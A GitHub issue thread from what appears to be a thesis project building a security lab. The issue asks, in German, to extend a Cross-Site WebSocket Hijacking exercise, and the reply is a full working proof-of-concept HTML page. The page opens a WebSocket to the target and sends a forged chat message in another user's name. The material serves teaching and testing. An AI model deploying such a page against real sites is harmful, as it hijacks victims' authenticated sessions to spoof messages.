### ISSUE TITLE
Doku: CSWSH: Aufgabenstellung

### ISSUE THREAD

**Issue by rustaska** [patricksteinhaeusl/Bachelorarbeit#101]
Aufgabenstellung so erweitern, dass man nicht nur abhören muss sondern auch noch eine falsche Nachricht injecten kann

**Comment by patricksteinhaeusl** [comment]
<!DOCTYPE html>
<html lang="en">
	<head>
		<meta charset="UTF-8">
		<title>CSWSH</title>
	</head>
	<body>
		<h1>CSWSH</h1>
		<p>You got hacked!</p>

		<script type="text/javascript">
			var oReq = new XMLHttpRequest();
			var socket = new WebSocket("wss://glocken/socket.io/?EIO=3&transport=websocket");

			socket.onopen = function(openEvent) {
				console.log(openEvent);
			}
			socket.onmessage = function(msgEvent) {
				console.log(msgEvent);
				var msg = ["saveMessage",{
					"from":{"userId":"5aa0481e876d9d39d4397859","username":"customer0"},
					"to":{"userId":"5aa0481e876d9d39d439785c","username":"customer1"},
					"text":"You got hacked again!"
				}];

				socket.send(4211+JSON.stringify(msg));
			};
			socket.onerror = function(errEvent) {
				console.log(errEvent);
			};
		</script>
		
	</body>
</html>
